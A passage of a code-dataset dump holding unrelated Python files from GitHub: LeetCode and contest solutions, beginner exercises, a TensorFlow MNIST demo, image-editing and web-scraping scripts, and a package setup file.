1/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22746937488","text":"\"\"\"This script creates a new README.md file in the root folder of the project\nby copying the contents of the file at docs/index.md, while applying some\ntransformations to the contents of the file to adapt it to work well on GitHub.\n\"\"\"\n\nimport re\n\nfrom ..common import repo_url, site_url\n\nMAIN_INDEX_PATH = \"./docs/index.md\"\nGITHUB_README_PATH = \"./README.md\"\nBASE_URL = \"https://www.locationhistoryformat.com/\"\nDISCLAIMER_HEADER = f\"\"\n\n\ndef main():\n config_maps = {\n \"config.site_url\": site_url(),\n \"config.repo_url\": repo_url(),\n }\n\n with open(MAIN_INDEX_PATH, \"r\") as inp, open(GITHUB_README_PATH, \"w\") as out:\n out.write(DISCLAIMER_HEADER + \"\\n\\n\")\n lines = 
iter(inp.readlines())\n for original_line in lines:\n line = original_line\n\n # remove images\n line = re.sub(r\"!\\[.*\\]\\(.*\\)\", \"\", line)\n\n # adapt local URLs\n line = re.sub(r\"\\./([0-9A-Za-z/_]+)\\.md\", rf\"{BASE_URL}\\1\", line)\n\n # replace config macros\n line = re.sub(r\"{{ ([0-9A-Za-z._]+) }}\", lambda match: config_maps[match.group(1)], line)\n\n # adapt admonitions\n if line.startswith(\"!!!\"):\n # NOTE: we are assuming admonitions never have images or local URLs\n\n for line in lines:\n if line == \"\\n\":\n out.write(\"\\n\")\n elif line.startswith(4 * \" \"):\n out.write(\"> \" + line[4:])\n else:\n break\n\n if original_line == line or line != \"\\n\":\n out.write(line)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CarlosBergillos/LocationHistoryFormat","sub_path":"tools/github_readme/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"1431052064","text":"# -*- coding: utf-8 -*-\n\ndef calc_sum(*args):\n ax = 0\n for n in args:\n ax = ax + n\n return ax\n\ndef lazy_sum(*args):\n def sum():\n ax = 0\n for n in args:\n ax = ax +n\n return ax\n\n return sum\n\nf1=lazy_sum(1,2,3,4,5)\nf2=lazy_sum(1,2,3,4,5)\nprint(f1)\nprint(f2)\n\n\n#def count():\n# fs=[]\n# for i in range(1,4):\n# def f():\n# return i * i\n# fs.append(f)\n# return fs\n\ndef count():\n def f(j):\n def g():\n return j*j\n return g\n\n fs = []\n\n for i in range(1,4):\n fs.append(f(i))\n return fs\n\n\nf1,f2,f3=count()\nprint(f1())\nprint(f2())\nprint(f3())\n\n\n\n\ndef createCounter():\n L = [0]\n def counter():\n L[0] = L[0] + 1\n return L[0]\n return counter\n\n\n# 测试:\ncounterA = createCounter()\nprint(counterA(), counterA(), counterA(), counterA(), counterA()) # 1 2 3 4 5\ncounterB = createCounter()\nif [counterB(), counterB(), counterB(), counterB()] == [1, 2, 3, 4]:\n print('测试通过!')\nelse:\n print('测试失败!')\n\n\n\n\n","repo_name":"kumaeki/python_introduction","sub_path":"do_fu_returnFunction.py","file_name":"do_fu_returnFunction.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72958172673","text":"\"\"\"\n给定一个二叉树,找出其最大深度。\n\n二叉树的深度为根节点到最远叶子节点的最长路径上的节点数。\n\"\"\"\n# Definition for a binary tree node.\nfrom collections import deque\nfrom typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def maxDepth(self, root: Optional[TreeNode]) -> int:\n res = 0\n q = deque()\n if not root:\n return res\n q.append(root)\n while q:\n res += 1\n print(res)\n for i in range(len(q)):\n node = q.popleft()\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n\n return res\n","repo_name":"SsuperL/leetcode-practice","sub_path":"simple/exercise_104.py","file_name":"exercise_104.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13856102819","text":"class Solution:\n def trap(self, height: List[int]) -> int:\n \n n = len(height)\n \n left = []\n max_l = 0\n \n for i in range(n):\n if height[i] > max_l:\n max_l = height[i]\n left.append(max_l)\n \n max_r = 0\n right = []\n \n for i in range(n-1,-1,-1):\n if height[i] > max_r:\n max_r = height[i]\n right = [max_r] + right \n \n\n res = 0\n\n for i in range(n):\n 
min_peak = min(left[i],right[i])\n\n if min_peak > height[i]:\n res += min_peak-height[i]\n \n return res\n\n##-------------------------stack method---------------------------------##\nclass Solution(object):\n def trap(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n \n stack = []\n count = 0\n \n for i in range(len(height)):\n while stack and height[stack[-1]] < height[i]:\n fill_ind = stack.pop()\n \n if stack:\n count += (min(height[i],height[stack[-1]])-height[fill_ind]) * (i-stack[-1]-1)\n \n stack.append(i)\n \n return count","repo_name":"brichi15/Coding-Practice","sub_path":"Trapping rain water.py","file_name":"Trapping rain water.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11215738699","text":"\"\"\"\r\nОпрос: Возьмите за основу код favorite_languages.py (с. 106).\r\n• Создайте список людей, которые должны участвовать в опросе по поводу \r\nлюбимого языка программирования. Включите некоторые имена, которые уже \r\nприсутствуют в списке, и некоторые имена, которых в списке еще нет.\r\n• Переберите список людей, которые должны участвовать в опросе. Если они\r\nуже прошли опрос, выведите сообщение с благодарностью за участие. Если \r\nони еще не проходили опрос, выведите сообщение с предложением принять \r\nучастие.\r\n\"\"\"\r\n\r\nfavorite_languages = {\r\n 'jen': 'python',\r\n 'sarah': 'c',\r\n 'edward': 'ruby',\r\n 'phil': 'python',\r\n }\r\n\r\npool_names = ['alex', 'jen', 'edward', 'max', 'john',]\r\n\r\nfor name in pool_names:\r\n if name in favorite_languages.keys():\r\n print(name.title() + \", спасибо за участие!\")\r\n else:\r\n print(name.title() + \", примите участие в опросе!\")","repo_name":"AlexProvatorov/python_crash_course","sub_path":"topic_6/ex_6.6.py","file_name":"ex_6.6.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74024706754","text":"import sys\n\ndef usage():\n\tprint (\"Search the keyword in the document.\")\n\tprint (\"python3 search_key.py \")\n\texit(1)\n\ndef main():\n\tif len(sys.argv) != 3:\n\t\tusage()\n\n\ttry:\n\t\tf = open(sys.argv[1], \"r\")\n\t\tkey = sys.argv[2]\n\n\t\ttmp1 = f.read()\n\t\ttmp2 = tmp1.split(\"\\n\")\n\n\t\tprint (\"lines: \", len(tmp2))\n\n\t\tfor e in tmp2:\n\t\t\tif key in e:\n\t\t\t\tprint (e)\n\n\t\tf.close()\n\texcept:\n\t\tprint (\"No Such File: %s\" % sys.argv[1])\n\t\tprint (\"Please try again.\")\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"hw5773/matls","sub_path":"scripts/search_key.py","file_name":"search_key.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11216333190","text":"#\n# [64] Minimum Path Sum\n#\n# https://leetcode.com/problems/minimum-path-sum/description/\n#\n# algorithms\n# Medium (40.29%)\n# Total Accepted: 140.6K\n# Total Submissions: 349K\n# Testcase Example: '[[1,3,1],[1,5,1],[4,2,1]]'\n#\n# Given a m x n grid filled with non-negative numbers, find a path from top\n# left to bottom right which minimizes the sum of all numbers along its path.\n# \n# Note: You can only move either down or right at any point in time.\n# \n# Example 1:\n# \n# [[1,3,1],\n# ⁠[1,5,1],\n# ⁠[4,2,1]]\n# \n# Given the above grid map, return 7. 
Because the path 1→3→1→1→1 minimizes the\n# sum.\n# \n#\nclass Solution(object):\n def minPathSum(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n rows = len(grid)\n cols = len(grid[0])\n \n # initialization\n dp = [[0 for j in xrange(cols)] for i in xrange(rows)]\n dp[0][0] = grid[0][0]\n for i in xrange(1, cols):\n dp[0][i] = dp[0][i - 1] + grid[0][i]\n for i in xrange(1, rows):\n dp[i][0] = dp[i - 1][0] + grid[i][0]\n \n # dynamic programming\n for i in xrange(1, rows):\n for j in xrange(1, cols):\n dp[i][j] = min(dp[i - 1][j], dp[i][j - 1]) + grid[i][j]\n return dp[rows - 1][cols - 1]\n","repo_name":"goalong/lc","sub_path":"v1/64.minimum-path-sum.106833375.ac.py","file_name":"64.minimum-path-sum.106833375.ac.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"6620452053","text":"import os\nfrom shutil import copyfile\n\nimport numpy as np\nimport pandas as pd\n\nfrom configs import cfg\n\nnp.random.seed(2018)\n\n\ndef random_split_data(all_data_file, dataset_name, vt_ratio=0.1, u_f=None,i_f=None):\n \"\"\"\n 随机切分已经生成的数据集文件 *.all.csv -> *.train.csv,*.validation.csv,*.test.csv\n :param all_data_file: 数据预处理完的文件 *.all.csv\n :param dataset_name: 给数据集起个名字\n :param vt_ratio: 验证集合测试集比例\n :param u_f: 用户特征文件 *.user.csv\n :param i_f: 物品特征文件 *.item.csv\n :return: pandas dataframe 训练集,验证集,测试集\n \"\"\"\n dir_name = os.path.join(cfg.DATASET_DIR, dataset_name)\n print('random_split_data', dir_name)\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n all_data = pd.read_csv(all_data_file, sep='\\t')\n vt_size = int(len(all_data) * vt_ratio)\n validation_set = all_data.sample(n=vt_size).sort_index()\n all_data = all_data.drop(validation_set.index)\n test_set = all_data.sample(n=vt_size).sort_index()\n train_set = all_data.drop(test_set.index)\n train_set.to_csv(os.path.join(dir_name, dataset_name + '.train.csv'),\n index=False, sep='\\t')\n validation_set.to_csv(os.path.join(dir_name, dataset_name +\n '.validation.csv'), index=False, sep='\\t')\n test_set.to_csv(os.path.join(dir_name, dataset_name + '.test.csv'),\n index=False, sep='\\t')\n if u_f is not None:\n copyfile(u_f, os.path.join(dir_name, dataset_name + '.user.csv'))\n if i_f is not None:\n copyfile(i_f, os.path.join(dir_name, dataset_name + '.item.csv'))\n return train_set, validation_set, test_set\n\n\ndef leave_out_by_time(all_data_file, dataset_name, leave_n=1, warm_n=5, u_f\n =None, i_f=None):\n \"\"\"\n Split train/validation/test by timestamp.\n By default, the interactions in all_data_file are already sorted by timestamp.\n :param all_data_file: preprocessed dataset file *.all.csv,which is sorted by timestamp.\n :param dataset_name: dataset name (used as the processed dataset name)\n :param leave_n: number of items that are left in validation and test set.\n :param warm_n: minimum number of interactions to leave in training dataset for each user.\n :param u_f: user feature file (not used here)\n :param i_f: item feature file (not used here)\n :return: pandas dataframe for training/validation/test sets\n \"\"\"\n dir_name = os.path.join(cfg.DATASET_DIR, dataset_name)\n print('leave_out_by_time', dir_name, leave_n, warm_n)\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n all_data = pd.read_csv(all_data_file, sep='\\t')\n min_label = all_data['label'].min()\n if min_label > 0:\n \"\"\"\n Keep at least 'warm_n' number of interactions in training dataset. 
\n If user has less than 'warm_n' interactions, then keep all the interactions in training set.\n This is to guarantee that no cold start issue for validation and testing.\n \"\"\"\n train_set = all_data.groupby('uid').head(warm_n)\n all_data = all_data.drop(train_set.index)\n test_set = all_data.groupby('uid').tail(leave_n)\n all_data = all_data.drop(test_set.index)\n validation_set = all_data.groupby('uid').tail(leave_n)\n all_data = all_data.drop(validation_set.index)\n else:\n \"\"\"\n Keep at least 'warm_n' number of interactions in training dataset. \n If user has less than 'warm_n' interactions, then keep all the interactions in training set.\n This is to guarantee that no cold start issue for validation and testing.\n \"\"\"\n train_set = []\n for uid, group in all_data.groupby('uid'):\n found, found_idx = 0, -1\n for idx in group.index:\n if group.loc[idx, 'label'] > 0:\n found_idx = idx\n found += 1\n if found >= warm_n:\n break\n if found_idx > 0:\n train_set.append(group.loc[:found_idx + 1])\n train_set = pd.concat(train_set)\n all_data = all_data.drop(train_set.index)\n test_set = []\n for uid, group in all_data.groupby('uid'):\n found, found_idx = 0, -1\n for idx in reversed(group.index):\n if group.loc[idx, 'label'] > 0:\n found_idx = idx\n found += 1\n if found >= leave_n:\n break\n if found_idx > 0:\n test_set.append(group.loc[found_idx:])\n test_set = pd.concat(test_set)\n all_data = all_data.drop(test_set.index)\n validation_set = []\n for uid, group in all_data.groupby('uid'):\n found, found_idx = 0, -1\n for idx in reversed(group.index):\n if group.loc[idx, 'label'] > 0:\n found_idx = idx\n found += 1\n if found >= leave_n:\n break\n if found_idx > 0:\n validation_set.append(group.loc[found_idx:])\n validation_set = pd.concat(validation_set)\n all_data = all_data.drop(validation_set.index)\n train_set = pd.concat([train_set, all_data]).sort_index()\n validation_set, test_set = validation_set.sort_index(\n ), test_set.sort_index()\n train_set.to_csv(os.path.join(dir_name, dataset_name + '.train.csv'),\n index=False, sep='\\t')\n validation_set.to_csv(os.path.join(dir_name, dataset_name +\n '.validation.csv'), index=False, sep='\\t')\n test_set.to_csv(os.path.join(dir_name, dataset_name + '.test.csv'),\n index=False, sep='\\t')\n if u_f is not None:\n copyfile(u_f, os.path.join(dir_name, dataset_name + '.user.csv'))\n if i_f is not None:\n copyfile(i_f, os.path.join(dir_name, dataset_name + '.item.csv'))\n return train_set, validation_set, test_set\n","repo_name":"gsq7474741/Paddle-NCR","sub_path":"utils/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30880865401","text":"# 2018/2/25\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom inspect import currentframe, getframeinfo\n\n\ndef get_linenumber():\n cf = currentframe()\n return cf.f_back.f_lineno\n\n\ndef get_filename():\n cf = currentframe()\n return getframeinfo(cf).filename\n\ndef get_mnist_data():\n mnist = input_data.read_data_sets(MINIST_DATA_PATH, one_hot=True);\n print(\"Train: \", mnist.train.images.shape, mnist.train.labels.shape);\n print(\"Test: \", mnist.test.images.shape, mnist.test.labels.shape);\n print(\"Validation: \", mnist.validation.images.shape, mnist.validation.labels.shape);\n return mnist\n\nprint(tf.__version__)\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nMINIST_DATA_PATH = 
\"./minist_data/\";\nprint(MINIST_DATA_PATH);\nprint(get_filename(),get_linenumber())\n\nsess = tf.InteractiveSession()\nlayer2_size = 784;\nin_units = 784\nh1_units = 300\n\n# Define y = W*x+b\nwith tf.name_scope('Net'):\n W1 = tf.Variable(tf.truncated_normal([in_units, h1_units], stddev=0.1), name='W1');\n b1 = tf.Variable(tf.zeros([h1_units]), name=\"b1\");\n W2 = tf.Variable(tf.zeros([h1_units, 10]), name=\"W2\");\n b2 = tf.Variable(tf.zeros([10]), name=\"b2\");\n x = tf.placeholder(tf.float32, [None, in_units], name='input_x');\n\n keep_prob = tf.placeholder(tf.float32);\n hidden1 = tf.nn.relu(tf.matmul(x, W1) + b1)\n hidden1_drop = tf.nn.dropout(hidden1, keep_prob);\n y = tf.nn.softmax(tf.matmul(hidden1_drop, W2) + b2);\n y_ = tf.placeholder(tf.float32, [None, 10])\n\n # Define cross entropy\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]), name='cross_entropy');\n train_step = tf.train.GradientDescentOptimizer(0.3).minimize(cross_entropy);\nprint(get_filename(),get_linenumber())\n\ntf.summary.FileWriter(\"logs_nlp/\", sess.graph)\n\ntf.global_variables_initializer().run();\n\nsess = tf.Session()\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1));\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32));\n# Get Mnist data\nmnist = get_mnist_data()\nplot_y=[]\nplot_x=[]\nfor i in range(3000):\n batch_xs, batch_ys = mnist.train.next_batch(10000);\n train_step.run({x: batch_xs, y_: batch_ys, keep_prob: 0.75});\n plot_acc = accuracy.eval({x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0})\n plot_x.append(i)\n plot_y.append(plot_acc)\n print(\"Inter \", i, \", accuracy = \", plot_acc);\nprint(\"===================\");\n\nplt.plot(plot_x,plot_y)\nplt.xlabel('train_step')\nplt.ylabel('acc')\nplt.show()\n\nprint(accuracy.eval({x: mnist.test.images, y_: mnist.test.labels, keep_prob:1.0}));\nprint(mnist)\n","repo_name":"ziv-lin/Learning_tf","sub_path":"mnist/demo_mnist_nlp.py","file_name":"demo_mnist_nlp.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28904156436","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import setup, find_packages\n\nrequirements = [\n 'cffi',\n 'wrapt',\n 'six',\n \"enum34 ; python_version < '3.4'\"\n]\n\nsetup_requirements = []\n\ntest_requirements = ['pytest', 'tox', 'virtualenv']\n\nsetup(\n author=\"Soul Melody\",\n classifiers=[\n 'Development Status :: 1 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Natural Language :: English',\n 'Python :: Implementation :: PyPy',\n ],\n description=\"Cffi wrapper of DOtherSide for pypy\",\n install_requires=requirements,\n license=\"GNU General Public License v3\",\n include_package_data=True,\n keywords='PyQuick',\n name='PyQuick',\n packages=find_packages(include=['PyQuick']),\n setup_requires=setup_requirements,\n test_suite='tests',\n tests_require=test_requirements,\n url='https://github.com/SoulMelody/PyQuick',\n version='0.0.1',\n zip_safe=False,\n)\n","repo_name":"SoulMelody/PyQuick","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31532348438","text":"from PIL import Image\r\nfrom PIL import PSDraw\r\n\r\n\r\ncatIm = 
Image.open('zophie.png')\r\ncatCopyIm=catIm.copy()\r\n\r\n\r\n\r\ncatIm=catIm.resize((600,800), Image.ANTIALIAS)\r\n\r\nwidth=catIm.size[0]\r\nheight=catIm.size[1]\r\n\r\nim = Image.new('RGBA', (100, 200), 'purple')\r\n\r\ncatIm.save('newzophie.png')\r\n\r\nim.save('im.png')\r\n\r\ncroppedIm = catIm.crop((235, 245, 465, 460))\r\ncroppedIm=croppedIm.resize((100,100), Image.ANTIALIAS)\r\ncroppedIm.save('cropped.png')\r\ncroppedIm.rotate(270).save('rotated270.png')\r\nrotated270=Image.open('rotated270.png')\r\n\r\n\r\ncatCopyIm.paste(croppedIm,(50,50))\r\ncatCopyIm.paste(croppedIm,(280,350))\r\ncatCopyIm.paste(rotated270, (50,350))\r\ncatCopyIm.save('catCopyIm.png')\r\n\r\nSQUARE_FIT_SIZE = 300\r\nLOGO_FILENAME= 'logocat.png'\r\n\r\nlogoim=Image.open(LOGO_FILENAME)\r\nlogowidth, logoheight = logoim.size\r\n\r\ncatCopyIm.paste(logoim, (width - logowidth, height - logoheight), logoim)\r\n\r\nprint (\"Width: \",width,\" Height: \",height)\r\n\r\n","repo_name":"geoakr84/python_project","sub_path":"postscript.py3","file_name":"postscript.py3","file_ext":"py3","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4264264844","text":"N, M = [int(i) for i in input().split()]\nP, R = [int(i) for i in input().split()]\ninfectados = []\ninfectados.append(P)\n\nfor i in range(1,M+1):\n reuniao = [int(j) for j in input().split()[1:]]\n if(i > R-1):\n if any(pessoa in infectados for pessoa in reuniao):\n infectados.extend([pessoa for pessoa in reuniao if pessoa not in infectados])\n\nprint(len(infectados))\n","repo_name":"claytonmaciel/obi","sub_path":"obi 2020/2020 - P2F1 - pandemia - 1.py","file_name":"2020 - P2F1 - pandemia - 1.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"pt","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"72281341954","text":"import time\r\nimport os\r\nimport xlsxwriter\r\nimport fitz\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import Select, WebDriverWait\r\n\r\n\r\ndef wait_for_downloads(path):\r\n print('Waiting for downloads', end='')\r\n while any([filename.endswith('.crdownload') for filename in\r\n os.listdir(path)]):\r\n time.sleep(2)\r\n print(\".\", end=\"\")\r\n print('\\nAll files downloaded!')\r\n\r\n\r\ndef parse_pdf_data(filename):\r\n doc = fitz.open(filename)\r\n investment_name = '1. Name of this Investment:'\r\n uii = '2. 
Unique Investment Identifier (UII):'\r\n page = doc.load_page(0)\r\n page_text = page.get_text(\"text\")\r\n values = []\r\n for line in page_text.split('\\n'):\r\n if uii in line:\r\n values.append(line.split(':')[1].strip())\r\n elif investment_name in line:\r\n values.append(line.split(':')[1].strip())\r\n return values\r\n\r\n\r\ndef main():\r\n print('Initialize.')\r\n\r\n with open('config.txt') as file:\r\n dep_to_scrap = file.readline().strip()\r\n chrome_options = webdriver.ChromeOptions()\r\n prefs = {'download.default_directory': f'{os.getcwd()}/output'}\r\n chrome_options.add_experimental_option('prefs', prefs)\r\n chrome_options.add_argument('--headless')\r\n chrome_options.add_argument('--no-sandbox')\r\n chrome_options.add_argument('--disable-dev-shm-usage')\r\n driver = webdriver.Chrome(options=chrome_options)\r\n\r\n print(f'Start!\\nDepartment to search:{dep_to_scrap}')\r\n driver.get('https://itdashboard.gov/')\r\n dive_it = driver.find_element(By.XPATH, \"//*[@id='node-23']/div/div/div/div/div/div/div/a\")\r\n dive_it.click()\r\n print('Click on \"Dive in\"!')\r\n deps = WebDriverWait(driver, 10).until(EC.visibility_of_all_elements_located(\r\n (By.XPATH, '//div[@id=\"agency-tiles-widget\"]//span[@class=\"h4 w200\"]')))\r\n budgets = driver.find_elements(By.XPATH, '//div[@id=\"agency-tiles-widget\"]//span[@class=\" h1 w900\"]')\r\n\r\n workbook = xlsxwriter.Workbook('output/write_data.xlsx')\r\n worksheet = workbook.add_worksheet(name=\"Departments\")\r\n worksheet.set_column(0, 0, 45)\r\n for row_num, data in enumerate(deps):\r\n worksheet.write(row_num, 0, data.text)\r\n for row_num, data in enumerate(budgets):\r\n worksheet.write(row_num, 1, data.text)\r\n print('Departments budgets: Done!')\r\n\r\n driver.find_element(By.XPATH, f\"//span[contains(text(), '{dep_to_scrap}')]\").click()\r\n select = Select(WebDriverWait(driver, 10).until(\r\n EC.visibility_of_element_located((By.XPATH, '//*[@id=\"investments-table-object_length\"]/label/select'))))\r\n select.select_by_value('-1')\r\n print('Show all entries.')\r\n time.sleep(15)\r\n\r\n tmp_table = []\r\n for i in driver.find_elements(By.XPATH, '//*[@id=\"investments-table-object\"]//tr'):\r\n if i.text != '':\r\n tmp_table.append(i.text)\r\n\r\n table = driver.find_elements(By.XPATH, '//*[@id=\"investments-table-object\"]//tr//td')\r\n agencies = workbook.add_worksheet(\"Agencies\")\r\n agencies.set_column(0, 0, 15)\r\n agencies.set_column(1, 1, 45)\r\n agencies.set_column(2, 2, 40)\r\n agencies.set_column(4, 4, 30)\r\n row_num = 0\r\n col_num = 0\r\n for data in table:\r\n if data.text != '':\r\n if col_num == 7:\r\n row_num += 1\r\n col_num = 0\r\n agencies.write(row_num, col_num, data.text)\r\n col_num += 1\r\n workbook.close()\r\n print('Excel file is done!')\r\n\r\n urls = driver.find_elements(By.XPATH, '//*[@id=\"investments-table-object\"]//tr//a')\r\n links = []\r\n for url in urls:\r\n links.append(url.get_attribute(\"href\"))\r\n for link in links:\r\n driver.get(link)\r\n button = WebDriverWait(driver, 10).until(EC.visibility_of_element_located(\r\n (By.XPATH, '//*[@id=\"business-case-pdf\"]/a')))\r\n driver.execute_script(\"arguments[0].click();\", button)\r\n print('Downloading file.')\r\n time.sleep(10)\r\n\r\n wait_for_downloads('output')\r\n\r\n file_list = []\r\n for file in os.listdir('output'):\r\n if file.endswith('.pdf'):\r\n file_list.append(os.path.join('output', file))\r\n for file in file_list:\r\n v = parse_pdf_data(file)\r\n print(f'Checking entries {v[1]}: {v[0]}')\r\n for element in 
tmp_table:\r\n if v[0] in element and v[1] in element:\r\n print('UII and Name of Investment are same!')\r\n\r\n driver.close()\r\n print('Browser closed!')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"ivannikovoleg/FPT_RPA","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23925827367","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 15 10:35:18 2022\n\n@author: zak\n\"\"\"\n\nimport dash\nfrom dash import html\nfrom dash.dependencies import Input, Output\n\napp = dash.Dash()\n\n\n\n\napp.layout = html.Div(id = 'parent', children = [\n \n html.Button(id = 'html-button', children = 'Click the button', n_clicks = 0),\n \n html.Br(),\n \n html.Div(id = 'output-text')\n \n \n \n ])\n\n@app.callback(Output(component_id = 'output-text', component_property = 'children'),\n Input(component_id = 'html-button', component_property = 'n_clicks') \n )\n\ndef button_update(value):\n return html.Div(str(value) + ' Clicks!')\n\n\nif __name__ == '__main__':\n app.run_server()\n \n \n ","repo_name":"ZakWrench/Archived","sub_path":"Python/Plotly.Dash/plotly_dash_basics/html_button_callbacks.py","file_name":"html_button_callbacks.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4611492800","text":"# https://docs.python.org/3/library/random.html\n\nimport random as rnd\n\n\ndef show(message, func, *args, **kvarg):\n print(message)\n for _ in range(20):\n print(func(*args, **kvarg), end=\" \")\n print(\"\\n\\n\")\n\n\ndef my_shuffle(my_list):\n rnd.shuffle(my_list)\n return my_list\n\n\nshow(\"random:\", rnd.random) # [0,1]\nshow(\"uniform:\", rnd.uniform, 10.0, 20.0) # [A,B]\nshow(\"randrange:\", rnd.randrange, 10, 60) # нижняя граница < верхней\nshow(\"randint:\", rnd.randint, 10, 60) # нижняя граница <= верхней\nshow(\"getrandbits:\", rnd.getrandbits, 100) # сгенерировать случайные 100 бит\nshow(\"choice:\", rnd.choice, [-10, -10, -20]) # выбрать случайный элемент\nshow(\"choices:\", rnd.choices, population=[1, 2, 3, 4, 5, 6, 7, 8, 9, 0], k=3)\nshow(\"sample:\", rnd.sample, [1, 2, 3, 4, 5, 6], k=6) # k <= len(list)\nshow(\"shuffle:\", my_shuffle, [1, 2, 3, 4, 5, 6])\nshow(\"gauss:\", rnd.gauss, mu=10, sigma=60)\nshow(\"lognormvariate:\", rnd.lognormvariate, mu=10, sigma=60)\nshow(\"normalvariate:\", rnd.normalvariate, mu=10, sigma=20)\nshow(\"vonmisesvariate:\", rnd.vonmisesvariate, mu=10, kappa=60)\nshow(\"paretovariate:\", rnd.paretovariate, alpha=10)\nshow(\"weibullvariate:\", rnd.weibullvariate, alpha=10, beta=60)\n\n\ndef gen_key_1(key_len):\n key = [i for i in range(1, key_len + 1)]\n rnd.shuffle(key)\n return key\n\n\ndef gen_key_2(key_len):\n key = []\n key_values = []\n for i in range(1, key_len + 1):\n key_values.append(i)\n while(True):\n key_id = rnd.randrange(0, len(key_values))\n key_elem = key_values[key_id]\n if key_elem not in key:\n del key_values[key_id]\n key.append(key_elem)\n if len(key) == key_len:\n break\n else:\n print(\"error!\")\n return key\n\n\nprint(gen_key_2(10))\n","repo_name":"1xdeadman/examples","sub_path":"4_modules/module_random.py","file_name":"module_random.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23410789201","text":"import sys\n\n# get the file\nf = 
open(sys.argv[1])\n\n# how many to examine\ncount = int(f.readline().strip())\n\n# to list\nr = []\nfor l in f:\n\tz = l.strip().split()\n\tr.append([int(x) for x in z])\n\n\n# use the remaining lines\nfor i in range(count):\n\ta = r[(10*i)+r[10*i][0]]\n\tb = r[(10*i)+5+r[10*i+5][0]]\n\n\tc = 0\n\tans = 0\n\tfor d in a:\n\t\tif d in b:\n\t\t\tc += 1\n\t\t\tans = d\n\tif c == 1:\n\t\tprint(\"Case #\" + str(i+1) + \": \" + str(ans))\n\telif c == 0:\n\t\tprint(\"Case #\" + str(i+1) + \": Volunteer cheated!\")\n\telse:\n\t\tprint(\"Case #\" + str(i+1) + \": Bad magician!\") \n\t\t\n\t\t\n\t\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1441.py","file_name":"1441.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1640608442","text":"\"\"\"\nDefinition for a point.\n\"\"\"\n\n\nclass Point:\n def __init__(self, a=0, b=0):\n self.x = a\n self.y = b\n\n\nclass Solution:\n \"\"\"\n @param n: An integer\n @param m: An integer\n @param operators: an array of point\n @return: an integer array\n \"\"\"\n\n def numIslands2(self, m, n, positions):\n \"\"\"\n :type m: int\n :type n: int\n :type positions: List[List[int]]\n :rtype: List[int]\n \"\"\"\n\n class 